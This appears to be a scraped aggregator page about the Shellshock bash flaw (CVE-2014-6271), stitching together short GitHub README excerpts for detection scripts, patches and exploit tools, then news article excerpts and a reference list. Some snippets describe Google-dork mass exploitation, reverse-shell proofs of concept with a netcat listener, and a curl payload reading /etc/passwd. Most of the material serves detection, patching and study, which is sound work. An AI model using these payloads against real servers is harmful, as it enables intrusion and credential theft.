项目介绍 这是一份开源安全项目清单,收集了一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。 这些开源项目,每一个都在致力于解决一些安全问题。 项目收集的思路: 一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。

CVE-2014-6271

Using google to scan sites for "ShellShock" (CVE-2014-6271)

Prerequisite sudo pip install shell install google python search githubcom/MarioVilas/google Run I use google to search first 1000 sites and try to get the /etc/passwd After tesing, there are many many many host that can be rooted!!!! By the way, this is only a proto, it has false positives Output like this: if second field is !!!, then You Can Get SHELL! $ python

XSHOCK Shellshock Exploit

xShock ShellShock   Written by Hulya Karabag Version 100 xShock ShellShock (CVE-2014-6271) This tool exploits shellshock Instagram: Capture the Root Screenshots How to use Click on the image Read Me All founded directories will be saved in vulnurltxt file The results of the executed commands are saved in responsetxt Features This tool include:

Una serie de scripts programados por allá del 2014/15. Hechos totalmente por diversión y aprendizaje.

Autoit Malware Scripts Una serie de scripts programados por allá del 2014/15 Hechos totalmente por diversión y aprendizaje Tened en cuenta que todos estos scripts fueron probados en el sistema operativo Windows 7 así como también en las versiones de Safari, Chrome y Opera de ese año RunPE - RunPEx64 Un RunPE es un script hecho para ejecutar

Patch for CVE-2014-6271 securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Usage install ansible on your local host add the servers you wish to patch to inventory run ansible-playbook /deployyml -i inventory

立ち上げ用issue

About US 趣旨 {何か}の情報の共有・活動場所や機会をつくる 活動内容 定例会 開催頻度は隔週。当分の間は自由に使える場所を使って行ってみる。占領はしないように気をつける。 内容(案です、内容募集してます) 簡単な発表・共有 こんなコード書きました こんなツール・言語便利

Plugins for nagios used by Voxer, made specifically for SmartOS

Voxer Nagios Plugins Plugins for nagios used by Voxer, made specifically for SmartOS Plugins check_shellshock Check bash for CVE-2014-6271 (shellshock) $ check_shellshock ok: bash is secure against shellshock You can pass an optional binary to check as the first argument, defaults to bash in your $PATH $ check_shellshock /bin/bash critical: /bin/bash is vulnerable to shellshoc

This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271

shellshocker-python This is a Python Application that helps you detect if your machine that run Bash is vulnerable by CVE-2014-6271

CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x='() { :;}; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line You may be prompted to enter your password bash &lt;( curl -s rawgithubusercontentcom/mattclegg/CVE-20

Search google for shellshock vulnerable sites

shellshock-hunter-google Search Google and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock Installation Requires Python 27 pip install --user selenium gevent git clone githubcom/DanMcInerney/shellshock-hunter-google cd shellshock-hunter-google/ Example python shellshock-hunter-googlepy -

CLI tool to check via node.js if you have a vulnerable bash Shellshock

CLI tool to check via nodejs if you have a vulnerable bash Shellshock (CVE-2014-6271) Install npm install shellshock -g Execute shellshock Output ✗ vulnerable bash or ✓ bash not vulnerable Contributors neydroid

Wrapper for /bin/bash that mitigates 'shellshock'

bash-shellshock wrapper This is a small wrapper around /bin/bash that refuses to start bash if any environment variables start with '(' It can also be run in a log-only mode and a mode that strips these 'bad' environment variables You can install this as a temporary workaround if you don't fully trust the latest patches for CVE-2014-6271 and CVE-2014

a collection of best pentest resources

pentest-tools a collection of best pentest resources Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Contents Online Resources Penetration Testing Resources Exploit Development Open Source Intelligence (OSINT) Resources Social

Awesome Penetration Testing A collection of awesome penetration testing resources This project is supported by Netsparker Web Application Security Scanner Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Your contributions and

A collection of awesome penetration testing resources, tools and other shiny things

Awesome Penetration Testing A collection of awesome penetration testing resources Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Your contributions and suggestions are heartily welcome (✿◕‿◕) Please check the Contr

Awesome Penetration Testing A collection of awesome penetration testing resources Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Your contributions and suggestions are heartily welcome (✿◕‿◕) Please check the Contr

OVAL For CentOS

OVAL-For-EL 中文 (Chinese version) English (English version) Features CentOS OVAL Split oval by severity Automatic update and revise with official security Supports OS Release Upstream Status redhat RHEL5 - RHEL8 wwwredhatcom/security/data/oval/ syncing centos EL5 - EL8 wwwredhatcom/security/data/oval/ syncing Scripts ​ scripts/rh2elpy

Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)

debian-lenny-bash_3252-cve-2014-6271 Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64) You can test the flaw by running: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

shellshock-exploit this script for exploit #cve-2014-6271, NOTE you should edit the target HTB:wwwhacktheboxeu/home/users/profile/14397 Twitter: twittercom/MoayadAlmalat

Automated vulnerability creation framework

Introduction The following project is created in order to mitigate the problem of applying vulnerabilities to already existing machines for educational purposes A vulnerability is a programmer's unintended mistake in a program’s source code, misconfiguration or hardware design mistake that can lead to a malicious or unexpected behavior The field of cyber security i

An automated vulnerability testing framework.

Auto Vulnerability Tester An extensible automated vulnerability testing framework written in Python3 by Nicholas Lochner for CS460 at the University of Illinois at Urbana-Champaign All code was written by Nicholas Lochner, except for "heartbleedpy", which is a modified version of the Heartbleed proof of concept by Jared Stafford The source is licensed under the GNU

Written fro CVE-2014-6271

Cgi-bin_bash_Reverse POC for CVE-2014-6271 Src:gistgithubcom/matjohn2/bc9689c60d4c9c5a2538

EXP利用脚本BY b01u

CVE-2014-6271py 写了个脚本,实现中使用的是未封禁的GOOGLE的IP,因此不用翻墙就能直接使用。 实现功能 goolge批量检测BASH漏洞; 对给定URL进行EXPLOIT; 统计功能,大概就是了解下BASH漏洞的概率,测试了下,差不多500个URL才出一个可利用的BASH漏洞的URL; 把具有漏洞的URL写入文件。 使用方法

Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock

Shellshock-Vulnerability-Scan Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock Download app from play store playgooglecom/store/apps/details?id=inindiandragonshellshockshellshockvulnerabilityscan

This offline tool is not supported and is provided for informational purposes only.

bashbug-shellshock-test This offline tool is not supported and is provided for informational purposes only This tool is dependent on Python 27 ''' ' ' Shellshock Test - CVE-2014-6271 ' Written by Tripwire VERT (wwwtripwirecom/vert) ' ' This offline tool is not supported and is provided for informational purposes only ' T

scripts associate with bourne shell EVN function parsing vulnerability CVE-2014-6271

shellshock scripts associated with bourne shell EVN function parsing vulnerability CVE-2014-6271 dhcp_monpy - This script monitors DHCP frames for potentially malicious characters within BOOTP and DHCP reply fields

This cookbook keeps bash packages latest version

bash Cookbook This cookbook keeps bash packages latest version CVE-2014-6271 seclistsorg/oss-sec/2014/q3/649 Requirements packages apt - manage packages in ubuntu and debian yum - manage packages in RHEL family Usage Just include bash in your node's run_list: { "name":"my_node", "run_list": [ "recipe[bash]" ] }

Exploit GNU Bash Env Command Injection via Google.

kbash Exploit GNU Bash Env Command Injection via Google CVE-2014-6271 Version 21 usage Batch Exploit GNU Bash Env Command Injection base on Google Version 21 optional arguments: -h, --help show this help message and exit -u URL specific a single Target Url -d DORK Custom Google Dork,Using Google Search to find targets -t THREAD_COUNT thre

patched-bash-4.3 for CVE-2014-6271

patched-bash-43 patched-bash-43 for CVE-2014-6271 This is just bash 43 , pulled from the gnu website, and patched with the patches available on 9/26/2014, including the pkgsrc functionality changes that just disable the silly "execute functions in env variables" altogether The patches are also included here, but I've already applied them to the sourcecode (fo

bashfix (for OSX) copied from StackOverflow answer here : applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851 Usage git clone githubcom/yanicklandry/bashfixgit ~/bashfix chmod a+x ~/bashfix/bash_fixsh ~/bashfix/bash_fixsh Test After executing : env x='() { :;}; echo vulne

shellshockersh This is ShellScript for CVE-2014-6271 ReverseShell

XSHOCK Shellshock Exploit

xShock ShellShock   Written by Hulya Karabag Version 100 xShock ShellShock (CVE-2014-6271) This tool exploits shellshock Instagram: Capture the Root Screenshots How to use Click on the image Read Me All founded directories will be saved in vulnurltxt file The results of the executed commands are saved in responsetxt Features This tool include:

Ansible Role Configures Host to be a Target in a Cyber Range

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

My adventures and write-ups from pwnable.kr. Don't look, there are spoilers!

Pwnable Where Nick tries to hack and constantly fails No peeking, there be spoilers below! Toddler's Bottle fd #include &lt;stdioh&gt; #include &lt;stdlibh&gt; #include &lt;stringh&gt; char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc&lt;2){ printf("pass argv[1] a number\n"); return 0; } // Convert argv[1

Some bash scripts I use.

bash Some bash scripts I use Updated to include a quick test for CVE-2014-6271 (Shellshock) #!/bin/sh if [ "$SHELL" = "/bin/bash" ] then echo "You are using Bash" echo "$BASH_VERSION" env test='() { :; }; echo This version is vulnerable' bash -c 'echo ' fi I added a Wiki article that describes the settings I us

Project 9 - Honeypots Honeypots Deployed: I used the Modern Honey Network (MHN) to complete the assignment for Week 9 In total, I created five Ubuntu 1404 honeypots All of the honeypots, including the MHN admin web application, were hosted in the Google Cloud Honeypots: Ubuntu 1404- Dionaea with HTTP: Goal is to trap malware that exploits vulnerabilties in an exposed net

Remote Bash Execution

RBE Remote Bash Execution This POC (proof of concept) is for EDUCATIONAL PURPOSES ONLY! Please, do not use it with wrong intents in mind We set up a simple PHP website and a Python executable that exploits the bash shellshock vulnerability Development Please note that all the following tests were done in a local controlled environment for educational purposes only Do NOT do

CVE-2014-6271

Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell

CVE-2014-6271 python27 Start listening on your machine nc -l -p 4444 Run python script by the rule below: python shellpocpy &lt;host&gt; &lt;vulnerable CGI&gt; &lt;attackhost/IP&gt; python shellpocpy 101010101 /cgi-bin/status 1010101/4444 Enjoy

Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271

Nessus_CVE-2014-6271_check Quick and dirty nessus audit file to check is bash is vulnerable to CVE-2014-6271

CVE-2014-6271_Test CVE-2014-6271_Test Obviously, this project is used to check if a server with cgi enabled is affected with CVE-2014-6271(aka shellshock) Dependency Need GoogleSearchCrawler Usage eg: python exppy -g wwwgooglecom This will test urls collected from google search result with keyword in file keywords run python exppy to see details

a auto script to fix CVE-2014-6271 bash vulnerability

bash-up a auto script to fix CVE-2014-6271 bash vulnerability

ShellShock Test

Shellshock Test ShellShock test checks for the recent CVE-2014-6271 Live : wwwdr4cun0com/shellshock/ Prerequisites : Apache Server running php If you want to use my proxy,contact me Questions and suggestions can be sent to : dhaval(at)dr4cun0com

Simple script to check for CVE-2014-6271

shocknaww Simple script to check for CVE-2014-6271 Example Usage /shocknawwpy foobar/cgi-bin/foo Sample vulnerable environment From the parent directory, run the following python -m CGIHTTPServer Now use shocknaww against your localhost test server /shocknawwpy 127001:8000/testpy

CVE-2014-6271 RCE tool

================================================================================================ BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 ===============================================================================

docker_CVE-2014-6271 docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory docker run -it -d -p 8080:80 DOCKERIMAGENAME verify execution with: docker ps verify web server execution: localhost:8080 exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \localhost:8080/cgi-bin/vulnerable

Demo Container Security App

shellshocked Demo Container Security App This application contains known security vulnerabities for demonstration purposes only* Do not use this anywhere * This is heavily based on the excellent demo at githubcom/opsxcq/exploit-CVE-2014-6271, but modified to run on Kubernetes

CVE-2014-6271 Python implementation of CVE-2014-6271: IP Fire (&lt;=215) ShellShock RCE Exploit is automatic See /CVE-2014-6271py --help for a full range of switches

awesome hacking chinese version

超棒黑客必备表单 English Version 一份精美的黑客必备表单,灵感来自于超棒的机器学习,如果您想为此列表做出贡献(欢迎),请在github给我一个pull或联系我@carpedm20,有关可供下载的免费黑客书籍列表,请点击此处。 目录 系统方面 教程 工具 Docker 常用 逆向方面 教程 工具 常用 Web

Awesome Security A collection of awesome software, libraries, documents, books, resources and cool stuff about security Inspired by awesome-php, awesome-python Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources Awesome Security Network Scann

Awesome Hacking A curated list of awesome Hacking Inspired by awesome-machine-learning If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20 For a list of free hacking books available for download, go here Table of Contents System Tutorials Tools Docker General Reverse Engineering Tutorials Tools General Web Tools General

Shellshock exploit + vulnerable environment

Shellshock exploit + vulnerable environment Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014 Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

Docker image to exploit RCE, try for pentest methods and test container security solutions (trivy, falco and etc.)

Shellshock exploit + vulnerable environment Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014 Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

##python系列教程(翻译) ~# python &gt;&gt;&gt; import urllib &gt;&gt;&gt; from bs4 import BeautifulSoup &gt;&gt;&gt; url = urlliburlopen("wwwprimalsecuritynet") &gt;&gt;&gt; output = BeautifulSoup(urlread(), 'lxml') &gt;&gt;&gt; outputtitle &lt;title&gt;Primal Security Podca

Recent Articles

HackinItaly: The Story Behind the Takedown of a 2,500-Strong QNAP NAS Botnet
BleepingComputer • Catalin Cimpanu • 10 Aug 2017

Last Friday, on August 4, a jury in the US found Fabio Gasperini, an Italian citizen, guilty of one misdemeanor for computer intrusion and was required to forfeit a botnet that was allegedly used to hijack remote servers and perform click fraud. 
Bleeping Computer reported on Gasperini's arrest and extradition to the US earlier this year, at the end of April. Today, we're circling back to provide an account of the events of how Gasperini built his botnet and how an investigation by

IT threat evolution Q3 2014
Securelist • David Emm Maria Garnaeva Victor Chebyshev Roman Unuchek Denis Makrushin Anton Ivanov • 18 Nov 2014

PDF version
In July we published our in-depth analysis into a targeted attack campaign that we dubbed ‘Crouching Yeti’. This campaign is also known as ‘Energetic Bear’.
This campaign, which has been active since late 2010, has so far targeted the following sectors:  industrial/machinery, manufacturing, pharmaceutical, construction, education and information technology.  So far there have been more than 2,800 victims worldwide, and we have been able to identify 101 d...

VXers Shellshocking embedded BusyBox boxen
The Register • Darren Pauli • 17 Nov 2014

It's 2014 and some people are still using default user names and passwords

Malware writers have crafted new wares to attack embedded devices running BusyBox and not yet patched against the ShellShock vulnerability, researcher Rhena Inocencio says.
Miscreants' tool of choice for such attacks is malware called "Bashlite" that, once executed on a victim machine, probes for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.
Trend Micro's Inocencio said the variant would download and...

Researcher Takes Wraps off Two Undisclosed Shellshock Vulnerabilities in Bash
Threatpost • Michael Mimoso • 03 Oct 2014

The Bash bug has kept Linux and UNIX administrators busy deploying a half-dozen patches, worrying about numerous Shellshock exploits in the wild, and a laboring over a general uncertainty that the next supposed fix will break even more stuff.
Researcher Michal Zalewski, a longtime bug-hunter, has been front and center on some of the Bash research and last week said he had found two additional bugs in the Bourne Again Shell, details of which he’d kept to himself until yesterday.
Za...

VMware Begins to Patch Bash Issues Across Product Line
Threatpost • Chris Brook • 01 Oct 2014

Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors’ hands in a similar fashion.
Virtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.
For the most part the company still has its hands full.
According to yesterday’s security advisory, it’s currently in the middle ...

Third patch brings more admin Shellshock for the battered and Bashed
The Register • Darren Pauli • 30 Sep 2014

'Okay we got it THIS time'

A third patch, from Red Hat engineer Florian Weimer, has been released for the vulnerable Bash Unix command-line interpreter, closing off flaws found in two previous fixes.
Weimer's unofficial fix was adopted upstream by Bash project maintainer Chet Ramey and released as Bash-4.3 Official Patch 27 (bash43-027) which addressed a bunch of previously undisclosed flaws including two remote exploit bugs.
The first patch (CVE-2014-6271) released Wednesday when the Shellshock flaw dropped w...

SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
The Register • John Leyden • 29 Sep 2014

CloudPassage points to 'pervasive' threat of Bash bug

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage.
The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE-2014-6271 weakness in the Bourne-Again Shell (Bash) affecting most Unix and Linux-based systems.
"The Shellshock vulnerability is one of the most pervasive threat...

Oracle SHELLSHOCKER - data titan lists unpatchables
The Register • Neil McAllister in San Francisco • 27 Sep 2014

Database kingpin lists 32 products that can't be patched (yet) as GNU fixes second vuln

Oracle has confirmed that at least 32 of its products are affected by the vulnerability recently discovered in the Bash command-line interpreter – aka the "Shellshock" bug – including some of the company's pricey integrated hardware systems.
The database giant issued a security alert regarding the issue on Friday, warning that many Oracle customers will have to wait awhile longer to receive patches.
"Oracle is still investigating this issue and will provide fixes for affected pro...

Stunned by Shellshock Bash bug? Patch all you can – or be punished
The Register • John Leyden • 26 Sep 2014

UK data watchdog rolls up its sleeves, polishes truncheon

Updated The UK's privacy watchdog is urging organisations to protect their systems against the infamous Shellshock vulnerability in Bash – even though the full scope of the security bug remains unclear.
The Shellshock flaw affects Bash up to and including version 4.3. It's a vital component of many Linux and Unix systems, as well as networking kit and embedded devices. It's also present in the latest versions of Apple's OS X for Macs.
The flaw allows hackers to execute arbitrary co...

Shellshock and its early adopters
Securelist • Stefan Ortloff • 26 Sep 2014

Shortly after disclosure of the Bash bug called “Shellshock” we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.
The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here’s an example of how this attack appears in a webserver logfile:

The atta...

How to resolve Shellshock on Mac OS X, web servers and more
welivesecurity • Stephen Cobb • 25 Sep 2014

A serious software vulnerability called the “Bash Bug” or “Shellshock” has just come to light and it affects a wide range of computers and digital devices, many of which will need to be fixed to prevent them leaking information or being taken over by malicious persons. The systems affected include Mac OS X computers, many web servers, and some home networking devices like routers. This blog post offers some preliminary advice about what to do in response to Shellshock, as well as links t...

Hackers thrash Bash Shellshock bug: World races to cover hole
The Register • John Leyden • 25 Sep 2014

Update your gear now to avoid early attacks hitting the web

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.
But as "millions" of servers, PCs and devices lay vulnerable or are being updated, it's emerged the fix is incomplete.
The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – includ...

“Bash” (CVE-2014-6271) vulnerability – Q&A
Securelist • GReAT • 25 Sep 2014

The “bash” vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.
In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.
At the time of writing, the v...

Bash Exploit Reported, First Round of Patches Incomplete
Threatpost • Michael Mimoso • 25 Sep 2014

The urgency to patch systems against the Bash zero-day vulnerability has been cranked to 10 after reports of an exploit in the wild have been made public by AusCERT, the Computer Emergency Response Team of Australia.
This seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a malware sample that points to a bot being distributed by the exploit.
Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert...

Patch Bash NOW: 'Shellshock' bug blasts OS X, Linux systems wide open
The Register • John Leyden • 24 Sep 2014

CGI scripts to DHCP clients hit by Heartbleed-grade remote-code exec vuln

Updated A bug discovered in the widely used Bash command interpreter poses a critical security risk to Unix and Linux systems – and, thanks to their ubiquity, the internet at large.
It lands countless websites, servers, PCs, OS X Macs, various home routers, and more, in danger of hijacking by hackers.
The vulnerability is present in Bash up to and including version 4.3, and was discovered by Stephane Chazelas. It puts Apache web servers, in particular, at risk of compromise: CGI sc...

References

CWE-78http://advisories.mageia.org/MGASA-2014-0388.htmlhttp://archives.neohapsis.com/archives/bugtraq/2014-10/0101.htmlhttp://jvn.jp/en/jp/JVN55667175/index.htmlhttp://jvndb.jvn.jp/jvndb/JVNDB-2014-000126http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10673http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.htmlhttp://linux.oracle.com/errata/ELSA-2014-1293.htmlhttp://linux.oracle.com/errata/ELSA-2014-1294.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.htmlhttp://lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00023.htmlhttp://lists.opensuse.org/opensuse-updates/2014-10/msg00025.htmlhttp://marc.info/?l=bugtraq&m=141216207813411&w=2http://marc.info/?l=bugtraq&m=141216668515282&w=2http://marc.info/?l=bugtraq&m=141235957116749&w=2http://marc.info/?l=bugtraq&m=141319209015420&w=2http://marc.info/?l=bugtraq&m=141330425327438&w=2http://marc.info/?l=bugtraq&m=141330468527613&w=2http://marc.info/?l=bugtraq&m=141345648114150&w=2http://marc.info/?l=bugtraq&m=141383026420882&w=2http://marc.info/?l=bugtraq&m=141383081521087&w=2http://marc.info/?l=bugtraq&m=141383138121313&w=2http://marc.info/?l=bugtraq&m=141383196021590&w=2http://marc.info/?l=bugtraq&m=141383244821813&w=2http://marc.info/?l=bugtraq&m=141383304022067&w=2http://marc.info/?l=bugtraq&m=141383353622268&w=2http://marc.info/?l=bugtraq&m=141383465822787&w=2http://marc.info/?l=bugtraq&m=141450491804793&w=2http://marc.info/?l=bugtraq&m=141576728022234&w=2http://marc.info/?l=bugtraq&m=141577137423233&w=2http://marc.info/?l=bugtraq&m=141577241923505&w=2http://marc.info/?l=bugtraq&m=141577297623641&w=2http://marc.info/?l=bugtraq&m=141585637922673&w=2http://marc.info/?l=bugtraq&m=141694386919794&w=2http://marc.info/?l=bugtraq&m=141879528318582&w=2http://marc.info/?l=bugtraq&m=142113462216480&w=2http://marc.info/?l=bugtraq&m=142118135300698&w=2http://marc.info/?l=bugtraq&m=142358026505815&w=2http://marc.info/?l=bugtraq&m=142358078406056&w=2http://marc.info/?l=bugtraq&m=142546741516006&w=2http://marc.info/?l=bugtraq&m=142719845423222&w=2http://marc.info/?l=bugtraq&m=142721162228379&w=2http://marc.info/?l=bugtraq&m=142805027510172&w=2http://packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.htmlhttp://packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.htmlhttp://packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1293.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1294.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1295.htmlhttp://rhn.redhat.com/errata/RHSA-2014-1354.htmlhttp://seclists.org/fulldisclosure/2014/Oct/0http://secunia.com/advisories/58200http://secunia.com/advisories/59272http://secunia.com/advisories/59737http://secunia.com/advisories/59907http://secunia.com/advisories/60024http://secunia.com/advisories/60034http://secunia.com/advisories/60044http://secunia.com/advisories/60055http://secunia.com/advisories/60063http://secunia.com/advisories/60193http://secunia.com/advisories/60325http://secunia.com/advisories/60433http://secunia.com/advisories/60947http://secunia.com/advisories/61065http://secunia.com/advisories/61128http://secunia.com/advisories/61129http://secunia.com/advisories/61188http://secunia.com/advisories/61283http://secunia.com/advisories/61287http://secunia.com/advisories/61291http://secunia.com/advisories/61312http://secunia.com/advisories/61313http://secunia.com/advisories/61328http://secunia.com/advisories/61442http://secunia.com/advisories/61471http://secunia.com/advisories/61485http://secunia.com/advisories/61503http://secunia.com/advisories/61542http://secunia.com/advisories/61547http://secunia.com/advisories/61550http://secunia.com/advisories/61552http://secunia.com/advisories/61565http://secunia.com/advisories/61603http://secunia.com/advisories/61633http://secunia.com/advisories/61641http://secunia.com/advisories/61643http://secunia.com/advisories/61654http://secunia.com/advisories/61676http://secunia.com/advisories/61700http://secunia.com/advisories/61703http://secunia.com/advisories/61711http://secunia.com/advisories/61715http://secunia.com/advisories/61780http://secunia.com/advisories/61816http://secunia.com/advisories/61855http://secunia.com/advisories/61857http://secunia.com/advisories/61873http://secunia.com/advisories/62228http://secunia.com/advisories/62312http://secunia.com/advisories/62343http://support.apple.com/kb/HT6495http://support.novell.com/security/cve/CVE-2014-6271.htmlhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bashhttp://www.debian.org/security/2014/dsa-3032http://www.kb.cert.org/vuls/id/252743http://www.mandriva.com/security/advisories?name=MDVSA-2015:164http://www.novell.com/support/kb/doc.php?id=7015701http://www.novell.com/support/kb/doc.php?id=7015721http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.htmlhttp://www.qnap.com/i/en/support/con_show.php?cid=61http://www.securityfocus.com/archive/1/533593/100/0/threadedhttp://www.securityfocus.com/bid/70103http://www.ubuntu.com/usn/USN-2362-1http://www.us-cert.gov/ncas/alerts/TA14-268Ahttp://www.vmware.com/security/advisories/VMSA-2014-0010.htmlhttp://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0http://www-01.ibm.com/support/docview.wss?uid=isg3T1021272http://www-01.ibm.com/support/docview.wss?uid=isg3T1021279http://www-01.ibm.com/support/docview.wss?uid=isg3T1021361http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004879http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004898http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004915http://www-01.ibm.com/support/docview.wss?uid=swg21685541http://www-01.ibm.com/support/docview.wss?uid=swg21685604http://www-01.ibm.com/support/docview.wss?uid=swg21685733http://www-01.ibm.com/support/docview.wss?uid=swg21685749http://www-01.ibm.com/support/docview.wss?uid=swg21685914http://www-01.ibm.com/support/docview.wss?uid=swg21686084http://www-01.ibm.com/support/docview.wss?uid=swg21686131http://www-01.ibm.com/support/docview.wss?uid=swg21686246http://www-01.ibm.com/support/docview.wss?uid=swg21686445http://www-01.ibm.com/support/docview.wss?uid=swg21686447http://www-01.ibm.com/support/docview.wss?uid=swg21686479http://www-01.ibm.com/support/docview.wss?uid=swg21686494http://www-01.ibm.com/support/docview.wss?uid=swg21687079http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315https://access.redhat.com/articles/1200223https://access.redhat.com/node/1200223https://bugzilla.redhat.com/show_bug.cgi?id=1141597https://help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixeshttps://kb.bluecoat.com/index?page=content&id=SA82https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648https://kc.mcafee.com/corporate/index?page=content&id=SB10085https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/https://support.apple.com/kb/HT6535https://support.citrix.com/article/CTX200217https://support.citrix.com/article/CTX200223https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.htmlhttps://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04518183https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlertshttps://www.exploit-db.com/exploits/34879/https://www.exploit-db.com/exploits/37816/https://www.exploit-db.com/exploits/38849/https://www.exploit-db.com/exploits/39918/https://www.exploit-db.com/exploits/40619/https://www.exploit-db.com/exploits/40938/https://www.exploit-db.com/exploits/42938/https://www.suse.com/support/shellshock/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-1294https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-7169https://usn.ubuntu.com/2362-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/39918/http://tools.cisco.com/security/center/viewAlert.x?alertId=35845